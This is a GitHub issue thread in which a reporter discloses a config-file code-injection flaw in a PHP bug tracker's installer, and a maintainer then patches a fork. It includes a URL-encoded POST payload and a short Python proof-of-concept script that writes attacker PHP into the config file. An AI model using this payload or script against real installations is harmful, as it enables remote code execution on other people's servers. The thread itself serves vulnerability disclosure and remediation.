Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

There is a security problem that can getshell #237

Closed
MrFk opened this issue Feb 20, 2019 · 32 comments

Comments

Projects
None yet
2 participants
@MrFk
Copy link

commented Feb 20, 2019

problem file at install/config-setup.php line 13

$config_file = str_replace('localhost', $_POST['database_host'], $config_file);

cause a security problem that can getshell

poc:

POST /install/config-setup.php

datas:create_config=123&database_host=%27%29%2C%27a%27%3D%3Evar_dump%28phpinfo%28%29%29%29%3F%3E

finally,at the config.app.php, you can the phpinfo();

image

My Email is:jack.jiang@dbappsecurity.com.cn
Thank you very much

@Patriboom

This comment has been minimized.

Copy link

commented Feb 20, 2019

What is your suggestion ?

@MrFk

This comment has been minimized.

Copy link
Author

commented Feb 20, 2019

after the install.php,delete config-setup.php by the php code

@Patriboom

This comment has been minimized.

Copy link

commented Feb 20, 2019

This already works, and many more features are availables on the following fork: https://github.com/pixeline/bugs/issues

@MrFk

This comment has been minimized.

Copy link
Author

commented Feb 20, 2019

But it didn't delete the file on my computer,is there anything wrong with it?

@Patriboom

This comment has been minimized.

Copy link

commented Feb 20, 2019

No.
The system is supposed to check if the config file exists. If so, the system launches the application.
If no, it launches the installation.
Doesn't matter if the installation file is not deleted. If the system finds the config file, the installation file will never be launched anymore.

@MrFk

This comment has been minimized.

Copy link
Author

commented Feb 20, 2019

But finish the install,the config.app.example still exists,and you need to delete the config.app.example after the installation by the php-code.

@Patriboom

This comment has been minimized.

Copy link

commented Feb 20, 2019

No.
You don't need to delete the file.
It can stay there as « backup » since it will never be red anymore by the system.

@MrFk

This comment has been minimized.

Copy link
Author

commented Feb 20, 2019

but i can cause a security proble

@MrFk

This comment has been minimized.

Copy link
Author

commented Feb 20, 2019

image
it shouldn't be delete by the people but by the code

@Patriboom

This comment has been minimized.

Copy link

commented Feb 20, 2019

That's solved in more recent forks like the one I mentionned before.
The actual Mikelbring/tinyissue is very old. Last update SIX YEARS ago!!!
I suggest you to use a more recent fork.

@MrFk

This comment has been minimized.

Copy link
Author

commented Feb 20, 2019

no, https://github.com/pixeline/bugs also exists this problem,look at this

image

@Patriboom

This comment has been minimized.

Copy link

commented Feb 20, 2019

The same code. I know.
But, it doesn't ask you to delete any file after a complete install process.

@MrFk

This comment has been minimized.

Copy link
Author

commented Feb 20, 2019

So it is a security problem by default setting.It should be delete or rename the install file after the installation by the install program.

@Patriboom

This comment has been minimized.

Copy link

commented Feb 20, 2019

Where do you get such screenshots from ?
I would like to repeat the same test as you do.

@Patriboom

This comment has been minimized.

Copy link

commented Feb 20, 2019

Please explain better the issue you've found.
What can create such « miss coding » about you ?

@MrFk

This comment has been minimized.

Copy link
Author

commented Feb 20, 2019

I build the environment on my computer.
I escaped the Array in config.app.example.php.

PostData is '),'a'=>var_dump(phpinfo()))?>

@Patriboom

This comment has been minimized.

Copy link

commented Feb 20, 2019

For sure, with any open source code, you can change the code and force it to do something which has not been planned by the initial project.
Is the original code exposes users to any threat ?
If so, which ? and how ?

Your initial sentence was:

cause a security problem that can getshell

What is "getshell" ?

@MrFk

This comment has been minimized.

Copy link
Author

commented Feb 20, 2019

"Getshell" means remote command execute,an attacker can execute command on your service

@Patriboom

This comment has been minimized.

Copy link

commented Feb 20, 2019

Ok.
Now, how the code permits that ?
Don't say « the hacker can changes the code ». If he can, he doesn't need the code to hack the computer, it's already hacked.

@MrFk

This comment has been minimized.

Copy link
Author

commented Feb 20, 2019

the hacker just need to repeat my postdata create_config=123&database_host=%27%29%2C%27a%27%3D%3Evar_dump%28phpinfo%28%29%29%29%3F%3E like this,the attacker can execute any code if he liked

@Patriboom

This comment has been minimized.

Copy link

commented Feb 20, 2019

If, and only if the attacker

  1. Get access to the computer
  2. know the exact name and address of the specific page config-setup.php
    If hacker has it, he doesn't need config-setup.php as tool to go further; he is already in the machine and does whatever he wants.
    Where, when and how do you submit such postdata ?

Or maybe you put the create_config= in the install page's field.

@MrFk

This comment has been minimized.

Copy link
Author

commented Feb 20, 2019

Yeah,by the default setting,hacker can access the install/config-setup.php easily.

@Patriboom

This comment has been minimized.

Copy link

commented Feb 20, 2019

I tried you code

create_config=123&database_host=%27%29%2C%27a%27%3D%3Evar_dump%28phpinfo%28%29%29%29%3F%3E

replacing "localhost" in the install form.

I got an error from system, not any kind of phpinfo() page.

@Patriboom

This comment has been minimized.

Copy link

commented Feb 20, 2019

Next, I'll try to replace the "create_config" value with your code.

@Patriboom

This comment has been minimized.

Copy link

commented Feb 20, 2019

Doing so: nothing like a phpinfo() again.

@Patriboom

This comment has been minimized.

Copy link

commented Feb 20, 2019

Yeah,by the default setting,hacker can access the install/config-setup.php easily.

I would like to help people to avoid that. But I'm still unable to redo what you're doing.
May you explain me step by step, please.

@MrFk

This comment has been minimized.

Copy link
Author

commented Feb 20, 2019

ok,i'll show you the code in a minutes

@MrFk

This comment has been minimized.

Copy link
Author

commented Feb 20, 2019

import requests

def attack(url):

    datas = {
        'create_config':'123',
        'database_host':"'),'a'=>var_dump(phpinfo()))?>"
    }

    attack_url = '{0}/bugs/install/config-setup.php'.format(url)

    res = requests.post(attack_url,data=datas)

    print res.content


if __name__=='__main__':
    #edit your url here
    attack('http://192.168.2.147')

the code using python 2.7,you just need to edit the url

@Patriboom

This comment has been minimized.

Copy link

commented Feb 20, 2019

Nice.
Big thanks.
The fork will be updated today.

@Patriboom

This comment has been minimized.

Copy link

commented Feb 20, 2019

https://github.com/pixeline/bugs 's install now delete de config file.

@MrFk

This comment has been minimized.

Copy link
Author

commented Feb 20, 2019

it's okay.

@Patriboom

This comment has been minimized.

Copy link

commented Feb 20, 2019

For any further suggestion, please comment on https://github.com/pixeline/bugs

@MrFk MrFk closed this Mar 4, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.